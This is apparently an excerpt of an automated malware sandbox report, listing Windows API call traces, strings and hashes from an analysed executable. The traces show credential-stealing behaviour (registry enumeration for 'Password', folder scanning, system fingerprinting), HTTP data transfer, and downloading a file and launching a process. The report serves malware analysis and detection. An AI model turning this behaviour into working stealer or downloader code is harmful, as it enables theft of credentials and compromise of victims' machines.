                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02D09927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D00DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D09948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D00FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D00FCD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction ID: 7fcb90b6916deaa18824c74cdf6450970294e9b4a2bdb4d5874a1b2016c3c09f
                                                        • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction Fuzzy Hash: 6A6170B5900218ABCB14EBA0DD95FED773AEF44304F40419DA70A661E1EE746F88CF69
                                                        APIs
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A51
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A68
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A7F
                                                          • Part of subcall function 02CF4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02CF4AA0
                                                          • Part of subcall function 02CF4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02CF4AB0
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02CF4B7C
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 02CF4BA1
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02CF4D21
                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 02CF504F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02CF506B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02CF507F
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02CF50B0
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF5114
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF512C
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02CF4D7C
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF5136
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID:
                                                        • API String ID: 2402878923-0
                                                        • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction ID: e2990236120f74cc9433a37929a39cd9d24a4609f9ab8d0e95060c95579315fc
                                                        • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction Fuzzy Hash: A612BA76910318AACB19EB90DD91FEEB37AEF55304F50419DA206621E0EF742F88CF61
                                                        APIs
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A51
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A68
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A7F
                                                          • Part of subcall function 02CF4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02CF4AA0
                                                          • Part of subcall function 02CF4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02CF4AB0
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02CF6548
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 02CF656A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02CF659C
                                                        • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02CF65EC
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02CF6626
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02CF6638
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02CF6664
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02CF66D4
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF6756
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF6760
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF676A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID:
                                                        • API String ID: 3074848878-0
                                                        • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction ID: f6824cd7e996970d86910911d61d9a38face847a0819e93efe7b355b19f2c661
                                                        • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction Fuzzy Hash: 59713E75A40318ABDB64DFA0DC89FEE7779EB44704F204199E2066B2D0DBB46E84CF51
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02D092D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction ID: edb80b38d11cc46dd2b7e9f2aeb866965ae1a92ccfcacd5723de0daab4eaa0b8
                                                        • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction Fuzzy Hash: 6171FCB9A40208ABDB14DFE4DC94FEEB7B9FB49700F108108F505A72A4DB74A905CF61
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                        • memset.MSVCRT ref: 0041716A
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                        Strings
                                                        • sA, xrefs: 004172AE, 00417179, 0041717C
                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                        • sA, xrefs: 00417111
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                        • API String ID: 224852652-2614523144
                                                        • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                        • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                        • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                        • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D077A9
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D077E6
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D0786A
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D07871
                                                        • wsprintfA.USER32 ref: 02D078A7
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\$B
                                                        • API String ID: 1544550907-183544611
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: b597c8dadc2af6690888db6ec1d9b35698c0924b318b210c45a982efe766c2fe
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: 3D4162B1D40258ABDB10DFA4CC85BEEBBB5EF48704F004199E505AB3D0D7756E84CBA5
                                                        APIs
                                                          • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                          • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                          • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                          • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                          • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                          • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                        • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                        • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                        • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                        • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                        • task.LIBCPMTD ref: 004076FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                        • String ID: :
                                                        • API String ID: 3191641157-3653984579
                                                        • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                        • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                        • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                        APIs
                                                        • lstrcpy.KERNEL32(?,?), ref: 02D01642
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                          • Part of subcall function 02D094C7: StrStrA.SHLWAPI(?,?), ref: 02D094D3
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D0167E
                                                          • Part of subcall function 02D094C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 02D094F7
                                                          • Part of subcall function 02D094C7: lstrlen.KERNEL32(?), ref: 02D0950E
                                                          • Part of subcall function 02D094C7: wsprintfA.USER32 ref: 02D0952E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D016C6
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D0170E
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D01755
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D0179D
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D017E5
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D0182C
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D01874
                                                          • Part of subcall function 02D0AA87: lstrlen.KERNEL32(02CF516C,?,?,02CF516C,00420DDE), ref: 02D0AA92
                                                          • Part of subcall function 02D0AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D0AAEC
                                                        • strtok_s.MSVCRT ref: 02D019B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                        • String ID:
                                                        • API String ID: 4276352425-0
                                                        • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction ID: 04981f0d54343ef6c905567d44f6ed54dd4b0c02248d15257506071fd5a65976
                                                        • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                        • Instruction Fuzzy Hash: 527157B6950218ABCB54EBA0DCD8FEE737AEF54300F044598A10DA6290EE759F84CF71
                                                        APIs
                                                        • memset.MSVCRT ref: 00407314
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                        • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                          • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                        • task.LIBCPMTD ref: 00407555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                        • String ID: Password
                                                        • API String ID: 2698061284-3434357891
                                                        • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                        • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                        • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,02EB9DB8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                        • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                        • lstrcatA.KERNEL32(?,02E85BA8), ref: 00414847
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                        • lstrcatA.KERNEL32(?,02EBA508), ref: 0041486F
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                          • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                          • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                          • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID: 0aA
                                                        • API String ID: 167551676-2786531170
                                                        • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                        • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                        • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02EB9BF0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02EB9BF0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                        • __aulldiv.LIBCMT ref: 00418172
                                                        • __aulldiv.LIBCMT ref: 00418180
                                                        • wsprintfA.USER32 ref: 004181AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                        • String ID: %d MB$@
                                                        • API String ID: 2886426298-3474575989
                                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                        • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                        APIs
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A51
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A68
                                                          • Part of subcall function 02CF4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02CF4A7F
                                                          • Part of subcall function 02CF4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02CF4AA0
                                                          • Part of subcall function 02CF4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02CF4AB0
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02CF6376
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 02CF63AE
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02CF63F6
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02CF641A
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 02CF6443
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02CF6471
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 02CF64B0
                                                        • InternetCloseHandle.WININET(?), ref: 02CF64BA
                                                        • InternetCloseHandle.WININET(00000000), ref: 02CF64C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 4287319946-0
                                                        • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction ID: 141b48f8dba39c26bda8c4c34e1fb866c67ca2d5d74975e518f4174d2c379eaf
                                                        • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                        • Instruction Fuzzy Hash: 805160B5A40318ABDB60DFA1CC44BEE7779EB44705F108098E705A72C0DB746B89CFA5
                                                        APIs
                                                        • memset.MSVCRT ref: 02D04FEE
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D05017
                                                        • lstrcat.KERNEL32(?,00421000), ref: 02D05034
                                                          • Part of subcall function 02D04B77: wsprintfA.USER32 ref: 02D04B93
                                                          • Part of subcall function 02D04B77: FindFirstFileA.KERNEL32(?,?), ref: 02D04BAA
                                                        • memset.MSVCRT ref: 02D0507A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D050A3
                                                        • lstrcat.KERNEL32(?,00421020), ref: 02D050C0
                                                          • Part of subcall function 02D04B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D04BD8
                                                          • Part of subcall function 02D04B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D04BEE
                                                          • Part of subcall function 02D04B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D04DE4
                                                          • Part of subcall function 02D04B77: FindClose.KERNEL32(000000FF), ref: 02D04DF9
                                                        • memset.MSVCRT ref: 02D05106
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D0512F
                                                        • lstrcat.KERNEL32(?,00421038), ref: 02D0514C
                                                          • Part of subcall function 02D04B77: wsprintfA.USER32 ref: 02D04C17
                                                          • Part of subcall function 02D04B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02D04C2C
